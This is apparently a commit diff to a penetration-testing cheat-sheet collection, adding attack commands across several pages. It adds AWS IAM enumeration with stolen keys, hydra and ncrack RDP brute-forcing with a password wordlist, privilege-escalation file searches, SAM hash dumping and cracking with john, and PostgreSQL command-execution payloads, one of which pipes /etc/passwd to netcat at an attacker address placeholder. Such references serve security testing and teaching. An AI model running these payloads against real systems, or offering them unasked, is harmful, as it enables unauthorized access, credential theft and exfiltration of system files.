GraphQL + RDP Bruteforce + PostgreSQL RCE

Author: swisskyrepo

AWS Amazon Bucket S3/README.md

@@ -184,6 +184,32 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 
 
+## Enumerate IAM permissions
+
+Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)
+
+```powershell
+git clone git@github.com:andresriancho/enumerate-iam.git
+cd enumerate-iam/
+pip install -r requirements.txt
+./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
+2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
+2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
+2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
+    "RoleDetailList": [
+        {
+            "Tags": [], 
+            "AssumeRolePolicyDocument": {
+                "Version": "2008-10-17", 
+                "Statement": [
+                    {
+...
+2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
+2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
+2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
+2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
+2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
+```
 
 ## References
 

GraphQL Injection/README.md

@@ -1,6 +1,6 @@
 # GraphQL injection
 
-> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
+> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
 
 
 ## Summary
@@ -30,6 +30,7 @@ Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoin
 
 ```js
 example.com/graphql?query={__schema{types{name}}}
+example.com/graphiql?query={__schema{types{name}}}
 ```
 
 Check if errors are visible.

Methodology and Resources/Active Directory Attack.md

@@ -657,6 +657,13 @@ Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP servi
 python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
 ```
 
+Using [hydra]() and [ncrack]() to target RDP services.
+
+```powershell
+hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
+ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
+```
+
 Most of the time the best passwords to spray are :
 
 - Password1

Methodology and Resources/Linux - Privilege Escalation.md

@@ -228,6 +228,7 @@ SUID/Setuid stands for "set user ID upon execution", it is enabled by default in
 
 ```bash
 find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
+find / -uid 0 -perm -4000 -type f 2>/dev/null
 ```
 
 ### Create a SUID binary
@@ -388,13 +389,17 @@ Tool: [wildpwn](https://github.com/localh0t/wildpwn)
 
 ## Writable files
 
+List world writable files on the system.
+
 ```powershell
 find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
+find / -perm -2 -type f 2>/dev/null
+find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
 ```
 
 ### Writable /etc/passwd
 
-First generate a password with one of the following commands
+First generate a password with one of the following commands.
 
 ```powershell
 openssl passwd -1 -salt hacker hacker

Methodology and Resources/Network Pivoting Techniques.md

@@ -63,6 +63,7 @@ ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
 
 ```bash
 ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
+ssh -R 3389:10.1.1.224:3389 root@10.11.0.32
 ```
 
 ## Proxychains

Methodology and Resources/Windows - Privilege Escalation.md

@@ -206,7 +206,10 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 
 ### SAM and SYSTEM files
 
+The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
+
 ```powershell
+# Usually %SYSTEMROOT% = C:\Windows
 %SYSTEMROOT%\repair\SAM
 %SYSTEMROOT%\System32\config\RegBack\SAM
 %SYSTEMROOT%\System32\config\SAM
@@ -215,6 +218,15 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 %SYSTEMROOT%\System32\config\RegBack\system
 ```
 
+Generate a hash file for John using `pwdump` or `samdump2`.
+
+```powershell
+pwdump SYSTEM SAM > /root/sam.txt
+samdump2 SYSTEM SAM -o sam.txt
+```
+
+Then crack it with `john -format=NT /root/sam.txt`.
+
 ### Search for file contents
 
 ```powershell

SQL Injection/PostgreSQL Injection.md

@@ -9,6 +9,8 @@
 * [PostgreSQL File Read](#postgresql-file-read)
 * [PostgreSQL File Write](#postgresql-file-write)
 * [PostgreSQL Command execution](#postgresql-command-execution)
+    * [CVE-2019–9193](#cve-2019–9193)
+    * [Using libc.so.6](#using-libc-so-6)
 * [References](#references)
 
 ## PostgreSQL Comments
@@ -67,7 +69,9 @@ COPY pentestlab(t) TO '/tmp/pentestlab';
 
 ## PostgreSQL Command execution
 
-CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. 
+### CVE-2019–9193
+
+Can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries. 
 
 ```SQL
 DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Drop the table you want to use if it already exists
@@ -79,8 +83,16 @@ DROP TABLE IF EXISTS cmd_exec;          -- [Optional] Remove the table
 
 ![https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png](https://cdn-images-1.medium.com/max/1000/1*xy5graLstJ0KysUCmPMLrw.png)
 
+### Using libc.so.6
+
+```sql
+CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
+SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
+```
+
 ## References
 
 * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
 * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
-* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
+* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
+* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution)

Web Sockets/README.md

@@ -2,14 +2,17 @@
 
 > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
 
-Tools:
 
-- [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
 
 ## Summary
 
+* [Tools](#tools)
 * [Using ws-harness.py](#using-ws-harness-py)
 
+## Tools
+
+* [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
+
 ## Using ws-harness.py
 
 Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.